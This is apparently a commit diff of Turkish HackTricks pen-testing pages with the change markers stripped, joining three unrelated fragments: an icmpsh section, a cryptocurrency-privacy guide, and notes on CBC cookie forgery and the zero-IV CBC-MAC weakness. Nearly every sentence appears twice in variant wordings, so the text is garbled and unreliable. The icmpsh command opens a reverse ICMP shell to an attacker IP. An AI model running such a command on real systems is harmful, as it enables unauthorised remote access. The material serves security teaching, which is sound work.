**Bazı hatalar alırsanız, aşağıdaki satırları değiştirmeyi deneyin:**
```bash
IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
@ -35,16 +35,17 @@ read IP
```bash
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
```
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}

View file

@ -1,43 +1,43 @@
{% hint style="success" %}
AWS Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na (https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## Temel Kavramlar
- **Akıllı Sözleşmeler**, belirli koşullar karşılandığında bir blok zincirinde yürütülen programlar olarak tanımlanır, aracısız anlaşma yürütümlerini otomatikleştirir.
- **Merkeziyetsiz Uygulamalar (dApps)**, akıllı sözleşmelere dayanarak, kullanıcı dostu bir ön uç ve şeffaf, denetlenebilir bir arka uç sunar.
- **Token'lar ve Coin'ler**, coin'lerin dijital para olarak hizmet verirken, token'lar belirli bağlamlarda değer veya sahipliği temsil eder.
- **Fayda Token'ları**, hizmetlere erişim sağlarken, **Güvenlik Token'ları** varlık sahipliğini belirtir.
- **Akıllı Sözleşmeler** belirli koşullar sağlandığında bir blok zincirinde yürütülen programlar olarak tanımlanır, aracısız anlaşma yürütmeyi otomatikleştirir.
- **Merkezi Olmayan Uygulamalar (dApps)** akıllı sözleşmelere dayanarak, kullanıcı dostu bir ön uç ve şeffaf, denetlenebilir bir arka uç sunar.
- **Token'lar ve Coin'ler** coin'ler dijital para olarak hizmet ederken, token'lar belirli bağlamlarda değer veya sahipliği temsil eder.
- **Fayda Token'ları** hizmetlere erişim sağlarken, **Güvenlik Token'ları** varlık sahipliğini belirtir.
- **DeFi**, merkezi otoriteler olmadan finansal hizmetler sunan Decentralized Finance'ı temsil eder.
- **DEX** ve **DAO'lar**, sırasıyla Merkeziyetsiz Borsa Platformları ve Merkeziyetsiz Otonom Organizasyonları ifade eder.
- **DEX** ve **DAO'lar** sırasıyla Merkezi Olmayan Borsa Platformları ve Merkezi Olmayan Özerk Organizasyonları ifade eder.
## Konsensüs Mekanizmaları
Konsensüs mekanizmaları, blok zincirinde güvenli ve kabul edilmiş işlem doğrulamalarını sağlar:
- **Proof of Work (PoW)**, işlem doğrulaması için hesaplama gücüne dayanır.
- **Proof of Stake (PoS)**, doğrulayıcıların belirli miktarda token tutmasını gerektirir ve PoW'a göre enerji tüketimini azaltır.
- **Proof of Work (PoW)** işlem doğrulaması için hesaplama gücüne dayanır.
- **Proof of Stake (PoS** doğrulayıcıların belirli miktarda token tutmasını gerektirir ve PoW'a göre enerji tüketimini azaltır.
## Bitcoin Temelleri
### İşlemler
Bitcoin işlemleri, adresler arasında fon transferini içerir. İşlemler dijital imzalar aracılığıyla doğrulanır, yalnızca özel anahtar sahibinin transferleri başlatabileceğini garanti eder.
Bitcoin işlemleri adresler arasında fon transferini içerir. İşlemler dijital imzalar aracılığıyla doğrulanır, yalnızca özel anahtar sahibinin transferleri başlatabileceğini sağlar.
#### Ana Bileşenler:
- **Çoklu İmza İşlemleri**, bir işlemi yetkilendirmek için birden fazla imza gerektirir.
- İşlemler, **girişler** (fon kaynağı), **çıkışlar** (hedef), **ücretler** (madencilere ödenen) ve **scriptler** (işlem kuralları) içerir.
- **Çoklu İmza İşlemleri** bir işlemi yetkilendirmek için birden fazla imza gerektirir.
- İşlemler **girişler** (fon kaynağı), **çıkışlar** (hedef), **ücretler** (madencilere ödenir) ve **scriptler** (işlem kuralları) içerir.
### Lightning Network
@ -49,7 +49,7 @@ Birden fazla işlemi bir kanal içinde gerçekleştirerek Bitcoin'in ölçeklene
## Anonim Olarak Bitcoin Edinme
Yöntemler arasında nakit işlemler, madencilik ve karıştırıcı kullanımı bulunur. **CoinJoin**, izlenebilirliği karmaşıklaştırmak için birden fazla işlemi karıştırırken, **PayJoin**, gizliliği artırmak için CoinJoin'leri normal işlemlere benzetir.
Yöntemler arasında nakit işlemler, madencilik ve karıştırıcı kullanımı bulunur. **CoinJoin**, izlenebilirliği karmaşıklaştırmak için birden fazla işlemi karıştırırken, **PayJoin** CoinJoin'leri normal işlemler gibi gizler ve gizliliği artırır.
# Bitcoin Gizlilik Saldırıları
@ -63,14 +63,14 @@ Farklı kullanıcılara ait girişlerin genellikle aynı işlemde birleştirilme
## **UTXO Değişim Adresi Tespiti**
Bir UTXO veya **Harcanmamış İşlem Çıktısı**, bir işlemde tamamen harcanmalıdır. Eğer sadece bir kısmı başka bir adrese gönderilirse, kalan kısım yeni bir değişim adresine gider. Gözlemciler, bu yeni adresin gönderene ait olduğunu varsayabilir, gizliliği tehlikeye atar.
Bir UTXO veya **Harcanmamış İşlem Çıktısı**, bir işlemde tamamen harcanmalıdır. Eğer sadece bir kısmı başka bir adrese gönderilirse, geriye kalan yeni bir değişim adresine gider. Gözlemciler bu yeni adresin gönderene ait olduğunu varsayabilir, gizliliği tehlikeye atar.
### Örnek
Bunu önlemek için karıştırma hizmetleri veya birden fazla adres kullanımı sahipliği belirsizleştirmeye yardımcı olabilir.
## **Sosyal Ağlar ve Forumlar Maruziyeti**
## **Sosyal Ağlar ve Forumlarla Maruz Kalma**
Kullanıcılar bazen Bitcoin adreslerini çevrimiçi paylaşırlar, bu da adresi sahibiyle **kolayca ilişkilendirmeyi** sağlar.
Kullanıcılar bazen Bitcoin adreslerini çevrimiçi paylaşırlar, bu da adresi sahibiyle **ilişkilendirmeyi kolaylaştırır**.
## **İşlem Grafiği Analizi**
@ -78,7 +78,7 @@ Kullanıcılar bazen Bitcoin adreslerini çevrimiçi paylaşırlar, bu da adresi
## **Gereksiz Giriş Heuristiği (Optimal Değişim Heuristiği)**
Bu heuristik, birden fazla giriş ve çıkış içeren işlemleri analiz ederek, değişim olarak gönderilen çıktının gönderene geri dönen değişim olduğunu tahmin etmeye dayanır.
Bu heuristiğe dayalı olarak, birden fazla giriş ve çıkış içeren işlemler analiz edilerek, hangi çıkışın gönderene geri dönen değişim olduğu tahmin edilebilir.
### Örnek
```bash
@ -87,7 +87,7 @@ Bu heuristik, birden fazla giriş ve çıkış içeren işlemleri analiz ederek,
```
## **Zorunlu Adres Tekrarı**
Saldırganlar, önceki kullanılmış adreslere küçük miktarlar gönderebilir ve umut eder ki alıcı, gelecekteki işlemlerde bu miktarları diğer girdilerle birleştirerek adresleri birbirine bağlar.
Saldırganlar, alıcıların gelecekteki işlemlerde bu miktarları diğer girdilerle birleştirmesini umarak küçük miktarlar göndererek daha önce kullanılan adreslere gönderim yapabilir, böylece adresleri birbirine bağlayabilir.
### Doğru Cüzdan Davranışı
Bu gizlilik sızıntısını önlemek için cüzdanlar, zaten kullanılmış boş adreslere gelen paraları kullanmaktan kaçınmalıdır.
@ -95,26 +95,26 @@ Bu gizlilik sızıntısını önlemek için cüzdanlar, zaten kullanılmış bo
## **Diğer Blockchain Analiz Teknikleri**
- **Tam Ödeme Miktarları:** Değişiklik olmadan yapılan işlemler muhtemelen aynı kullanıcıya ait iki adres arasında gerçekleşir.
- **Yuvarlanmış Sayılar:** Bir işlemdeki yuvarlanmış bir sayı, muhtemelen bir ödeme olduğunu gösterir, yuvarlanmamış çıktının muhtemelen değişiklik olduğu anlamına gelir.
- **Cüzdan Parmak İzi:** Farklı cüzdanlar benzersiz işlem oluşturma desenlerine sahiptir, analistlerin kullanılan yazılımı ve muhtemelen değişiklik adresini belirlemesine olanak tanır.
- **Miktar ve Zaman Korelasyonları:** İşlem zamanlarını veya miktarlarınııklamak, işlemlerin izlenebilir olmasına neden olabilir.
- **Yuvarlanmış Sayılar:** Bir işlemdeki yuvarlanmış bir sayı, muhtemelen bir ödeme olduğunu gösterir, yuvarlanmamış çıktının değişiklik olduğu olasıdır.
- **Cüzdan Parmak İzi:** Farklı cüzdanlar benzersiz işlem oluşturma desenlerine sahiptir, analistlerin kullanılan yazılımı ve potansiyel olarak değişiklik adresini belirlemesine olanak tanır.
- **Miktar ve Zaman Korelasyonları:** İşlem zamanlarını veya miktarlarınııklamak işlemlerin izlenebilir olmasına neden olabilir.
## **Trafik Analizi**
Ağ trafiğini izleyerek, saldırganlar potansiyel olarak işlemleri veya blokları IP adresleriyle ilişkilendirebilir ve kullanıcı gizliliğini tehlikeye atabilir. Bu özellikle bir kurumun birçok Bitcoin düğümünü işletiyorsa ve işlemleri izleme yeteneklerini artırıyorsa geçerlidir.
Ağ trafiğini izleyerek saldırganlar, işlemleri veya blokları IP adresleriyle ilişkilendirebilir ve kullanıcı gizliliğini tehlikeye atabilir. Bu özellikle bir varlık çok sayıda Bitcoin düğmesi işletiyorsa ve işlemleri izleme yeteneklerini artırıyorsa geçerlidir.
## Daha Fazla
## Daha Fazlası
Gizlilik saldırıları ve savunmaları için kapsamlı bir liste için [Bitcoin Wiki'deki Bitcoin Gizliliği](https://en.bitcoin.it/wiki/Privacy) sayfasını ziyaret edin.
# Anonim Bitcoin İşlemleri
## Bitcoins'i Anonim Bir Şekilde Nasıl Alabilirsiniz
## Bitcoins Anonim Bir Şekilde Nasıl Alınır
- **Nakit İşlemler**: Bitcoin edinme yoluyla nakit kullanımı.
- **Nakit İşlemler**: Nakit ile bitcoin edinme.
- **Nakit Alternatifleri**: Hediye kartları satın almak ve bunları çevrimiçi olarak bitcoin'e dönüştürmek.
- **Madencilik**: Bitcoin kazanmanın en gizli yolu madencilik yapmaktır, özellikle yalnız yapıldığında, çünkü madencilik havuzları madencinin IP adresini bilebilir. [Madencilik Havuzları Bilgisi](https://en.bitcoin.it/wiki/Pooled_mining)
- **Hırsızlık**: Teorik olarak, bitcoin çalmak başka bir anonim şekilde edinme yöntemi olabilir, ancak yasa dışıdır ve önerilmez.
- **Madencilik**: Bitcoin kazanmanın en gizli yolu madencilik yapmaktır, özellikle yalnız yapıldığında çünkü madencilik havuzları madencinin IP adresini bilebilir. [Madencilik Havuzları Bilgisi](https://en.bitcoin.it/wiki/Pooled_mining)
- **Hırsızlık**: Teorik olarak, bitcoin çalmak başka bir anonim edinme yöntemi olabilir, ancak yasa dışıdır ve önerilmez.
## Karıştırma Hizmetleri
@ -122,62 +122,62 @@ Karıştırma hizmeti kullanarak bir kullanıcı **bitcoin gönderebilir** ve **
## CoinJoin
**CoinJoin**, farklı kullanıcılardan gelen birden fazla işlemi birleştirerek, girdileri çıktılarla eşleştirmeye çalışan herkes için işlemi karmaşık hale getirir. Etkili olmasına rağmen, benzersiz girdi ve çıktı boyutlarına sahip işlemler potansiyel olarak hala izlenebilir olabilir.
**CoinJoin**, farklı kullanıcılardan gelen birden fazla işlemi birleştirerek, girdileri çıktılarla eşleştirmeye çalışan herkes için işlemi karmaşık hale getirir. Etkili olmasına rağmen, benzersiz girdi ve çıktı boyutlarına sahip işlemler potansiyel olarak izlenebilir olabilir.
CoinJoin'i kullandığı düşünülen örnek işlemler şunları içerebilir: `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` ve `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`.
Daha fazla bilgi için [CoinJoin](https://coinjoin.io/en) sayfasını ziyaret edin. Ethereum'da benzer bir hizmet için [Tornado Cash](https://tornado.cash) sayfasına göz atın, bu hizmet madencilerden gelen fonlarla işlemleri anonimleştirir.
Daha fazla bilgi için [CoinJoin](https://coinjoin.io/en) sayfasını ziyaret edin. Ethereum'da benzer bir hizmet için [Tornado Cash](https://tornado.cash) sayfasına göz atabilirsiniz, bu hizmet madencilerden gelen fonlarla işlemleri anonimleştirir.
## PayJoin
CoinJoin'in bir türevi olan **PayJoin** (veya P2EP), işlemi iki taraf arasında (örneğin, bir müşteri ve bir satıcı) normal bir işlem gibi gizler, CoinJoin'in karakteristik eşit çıktılarını içermez. Bu, tespit etmeyi son derece zorlaştırır ve işlem gözetleme kuruluşları tarafından kullanılan ortak-girdi-sahipliği heuristiğini geçersiz kılabilir.
CoinJoin'in bir türevi olan **PayJoin** (veya P2EP), işlemi iki taraf arasında (örneğin, bir müşteri ve bir satıcı) düzenli bir işlem gibi gizler, CoinJoin'in karakteristik eşit çıktıları olmadan. Bu, tespit etmeyi son derece zorlaştırır ve işlem gözetleme kuruluşları tarafından kullanılan ortak-girdi-sahipliği sezgisini geçersiz kılabilir.
```plaintext
2 btc --> 3 btc
5 btc 4 btc
```
Yukarıdaki gibi işlemler PayJoin olabilir, standart bitcoin işlemlerinden ayırt edilemeyen gizliliği artırır.
**PayJoin'un kullanımı geleneksel gözetim yöntemlerini önemli ölçüde bozabilir**, bu da işlem gizliliğinin peşinde umut verici bir gelişmedir.
**PayJoin'un kullanımı geleneksel gözetleme yöntemlerini önemli ölçüde bozabilir**, bu da işlem gizliliğinin peşinde umut verici bir gelişmedir.
# Kripto Paralarda Gizlilik İçin En İyi Uygulamalar
# Kripto Paralardaki Gizlilik İçin En İyi Uygulamalar
## **Cüzdan Senkronizasyon Teknikleri**
Gizliliği ve güvenliği korumak için cüzdanları blok zinciri ile senkronize etmek önemlidir. İki yöntem öne çıkıyor:
Gizliliği ve güvenliği korumak için cüzdanları blok zinciriyle senkronize etmek önemlidir. İki yöntem öne çıkıyor:
- **Tam düğüm**: Tüm blok zincirini indirerek tam bir düğüm maksimum gizliliği sağlar. Yapılan tüm işlemler yerel olarak depolanır, bu da düşmanların kullanıcının hangi işlemlere veya adreslere ilgi duyduğunu belirlemesini imkansız hale getirir.
- **İstemci tarafı blok filtreleme**: Bu yöntem, blok zincirinde her blok için filtreler oluşturmayı içerir, bu da cüzdanların belirli ilgi alanlarını ağ gözlemcilerine açığa çıkarmadan ilgili işlemleri tanımlamasına olanak tanır. Hafif cüzdanlar bu filtreleri indirir, kullanıcının adresleriyle eşleşme bulunduğunda yalnızca tam blokları alır.
- **İstemci tarafı blok filtreleme**: Bu yöntem, blok zincirinde her blok için filtreler oluşturmayı içerir, bu da cüzdanların belirli ilgi alanlarını ağ gözlemcilerine açıklamadan ilgili işlemleri tanımlamasına olanak tanır. Hafif cüzdanlar bu filtreleri indirir, kullanıcının adresleriyle eşleşme bulunduğunda yalnızca tam blokları alır.
## **Anonimlik İçin Tor Kullanımı**
Bitcoin'in eşler arası ağ üzerinde çalıştığı göz önüne alındığında, ağla etkileşimde bulunurken gizliliği artırmak için IP adresinizi gizlemek için Tor kullanılması önerilir.
Bitcoin'in eşler arası ağ üzerinde çalıştığını göz önünde bulundurarak, ağla etkileşimde bulunurken gizliliği artırmak için Tor kullanılması önerilir.
## **Adres Tekrarını Önleme**
Gizliliği korumak için her işlem için yeni bir adres kullanmak hayati önem taşır. Adreslerin tekrar kullanılması, işlemleri aynı varlığa bağlayarak gizliliği tehlikeye atabilir. Modern cüzdanlar tasarımları aracılığıyla adres tekrarını önlemeye teşvik eder.
Gizliliği korumak için her işlem için yeni bir adres kullanmak önemlidir. Adres tekrarı, işlemleri aynı varlıkla ilişkilendirerek gizliliği tehlikeye atabilir. Modern cüzdanlar tasarımlarıyla adres tekrarını önler.
## **İşlem Gizliliği İçin Stratejiler**
- **Birden fazla işlem**: Bir ödemeyi birkaç işleme bölmek, işlem miktarını belirsizleştirerek gizlilik saldırılarını engelleyebilir.
- **Değişiklikten kaçınma**: Değişiklik çıktıları gerektirmeyen işlemleri tercih etmek, değişiklik tespit yöntemlerini bozarak gizliliği artırır.
- **Birden fazla değişiklik çıktısı**: Değişiklikten kaçınmak mümkün değilse, birden fazla değişiklik çıktısı oluşturmak yine de gizliliği artırabilir.
- **Birden fazla işlem**: Bir ödemeyi birkaç işleme bölmek, işlem miktarını belirsizleştirerek gizlilik saldırılarını engeller.
- **Para üstü vermemek**: Para üstü gerektirmeyen işlemleri tercih etmek, para üstü tespit yöntemlerini bozarak gizliliği artırır.
- **Birden fazla para üstü çıktısı**: Para üstü vermemek mümkün değilse, birden fazla para üstü çıktısı oluşturmak yine de gizliliği artırabilir.
# **Monero: Anonimliğin Işığı**
Monero, dijital işlemlerde mutlak anonimliğe olan ihtiyacı ele alır ve gizlilik için yüksek bir standart belirler.
Monero, dijital işlemlerde mutlak anonimliğe olan ihtiyacı ele alarak gizlilik için yüksek standartlar belirler.
# **Ethereum: Gaz ve İşlemler**
## **Gazın Anlaşılması**
Gaz, Ethereum'da işlemleri gerçekleştirmek için gereken hesaplama çabasını ölçer ve **gwei** cinsinden fiyatlandırılır. Örneğin, 2.310.000 gwei (veya 0.00231 ETH) maliyeti olan bir işlem, bir gaz limiti ve bir taban ücret içerir, madencileri teşvik etmek için bir bahşiş içerir. Kullanıcılar fazla ödeme yapmamak için maksimum ücreti ayarlayabilir, fazlası geri ödenir.
Gaz, Ethereum'da işlemleri gerçekleştirmek için gereken hesaplama çabasını ölçer ve **gwei** cinsinden fiyatlandırılır. Örneğin, 2.310.000 gwei (veya 0.00231 ETH) maliyeti olan bir işlem, bir gaz limiti ve bir taban ücret içerir ve madencileri teşvik etmek için bir bahşiş içerir. Kullanıcılar fazla ödeme yapmamak için maksimum ücreti ayarlayabilir, fazlası geri ödenir.
## **İşlemlerin Yürütülmesi**
Ethereum'daki işlemler bir gönderici ve bir alıcıyı içerir, bunlar kullanıcı veya akıllı kontrat adresleri olabilir. Bir ücret gerektirir ve madenciliği yapılmalıdır. Bir işlemin temel bilgileri alıcı, göndericinin imzası, değer, isteğe bağlı veriler, gaz limiti ve ücretleri içerir. Önemli bir nokta olarak, göndericinin adresi imzadan çıkarılarak işlem verilerinde gerekli olmaz.
Ethereum'daki işlemler bir gönderici ve bir alıcıyı içerir, bunlar kullanıcı veya akıllı kontrat adresleri olabilir. Bir ücret gerektirir ve madencilik yapılmalıdır. Bir işlemin temel bilgileri alıcı, göndericinin imzası, değer, isteğe bağlı veri, gaz limiti ve ücretleri içerir. Önemli bir nokta olarak, göndericinin adresi imzadan çıkarılarak işlem verilerinde gerekli olmaz.
Bu uygulamalar ve mekanizmalar, gizlilik ve güvenliği önceliklendiren herkes için kripto paralarla etkileşimde bulunmak isteyenler için temel niteliktedir.
Bu uygulamalar ve mekanizmalar, gizlilik ve güvenliği önceliklendiren herkes için temel niteliktedir.
## Referanslar
@ -188,18 +188,3 @@ Bu uygulamalar ve mekanizmalar, gizlilik ve güvenliği önceliklendiren herkes
* [https://ethereum.org/en/developers/docs/transactions/](https://ethereum.org/en/developers/docs/transactions/)
* [https://ethereum.org/en/developers/docs/gas/](https://ethereum.org/en/developers/docs/gas/)
* [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced\_address\_reuse)
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **HackTricks'te şirketinizi reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da takip edin.
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar göndererek **paylaşın**.
</details>

View file

@ -1,81 +1,83 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
# CBC
Eğer **çerez** sadece **kullanıcı adı** ise (veya çerezin ilk kısmı kullanıcı adı ise) ve kullanıcı adını "**admin**" olarak taklit etmek istiyorsanız. O zaman, kullanıcı adını **"bdmin"** olarak oluşturabilir ve çerezin **ilk baytını** **bruteforce** edebilirsiniz.
Eğer **çerez** sadece **kullanıcı adı** (veya çerezin ilk kısmı kullanıcı adı ise) ise ve kullanıcı adını "**admin**" olarak taklit etmek istiyorsanız. O zaman, kullanıcı adını **"bdmin"** olarak oluşturabilir ve çerezin **ilk byte'ını** **bruteforce** edebilirsiniz.
# CBC-MAC
**Şifre blok zincirleme mesaj doğrulama kodu** (**CBC-MAC**), kriptografi alanında kullanılan bir yöntemdir. Bir mesajı blok blok şifreleyerek çalışır, her bloğun şifrelemesi bir önceki bloğa bağlıdır. Bu süreç, orijinal mesajın sadece bir bitinin bile değişmesinin son şifreli verinin son bloğunda öngörülemeyen bir değişikliğe yol açacağını sağlayan bir **blok zinciri** oluşturur. Böyle bir değişiklik yapmak veya tersine çevirmek için şifreleme anahtarı gereklidir, bu da güvenliği sağlar.
**Cipher block chaining message authentication code** (**CBC-MAC**), kriptografi alanında kullanılan bir yöntemdir. Bir mesajı blok blok şifreleyerek çalışır, her bloğun şifrelemesi bir önceki bloğa bağlıdır. Bu süreç, orijinal mesajın sadece bir bitinin bile değiştirilmesinin şifreli verinin son bloğunda öngörülemeyen bir değişikliğe yol açacağından emin olmak için bir **blok zinciri** oluşturur. Böyle bir değişiklik yapmak veya tersine çevirmek için şifreleme anahtarı gereklidir, bu da güvenliği sağlar.
Mesaj m'nin CBC-MAC'ini hesaplamak için, m'yi sıfır başlangıç vektörü ile CBC modunda şifreler ve son bloğu saklar. Aşağıdaki şekil, bir mesajın CBC-MAC'inin hesaplanmasını gösteren bir figürdür![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5) gizli anahtar k ve blok şifresi E kullanılarak:
Mesaj m'nin CBC-MAC'ini hesaplamak için, m'yi sıfır başlangıç vektörü ile CBC modunda şifreler ve son bloğu saklar. Aşağıdaki şekil, bir gizli anahtar k ve bir blok şifresi E kullanılarak mesajın bloklarından oluşan bir CBC-MAC'in hesaplanmasını tasvir eder: ![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5)
![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
# Zafiyet
# Zayıflık
CBC-MAC ile genellikle **kullanılan IV 0'dır**.\
Bu, 2 bilinen mesajın (`m1` ve `m2`) bağımsız olarak 2 imza (`s1` ve `s2`) oluşturacağı bir sorundur. Yani:
Bu bir problemdir çünkü 2 bilinen mesaj (`m1` ve `m2`) bağımsız olarak 2 imza (`s1` ve `s2`) oluşturacaktır. Yani:
* `E(m1 XOR 0) = s1`
* `E(m2 XOR 0) = s2`
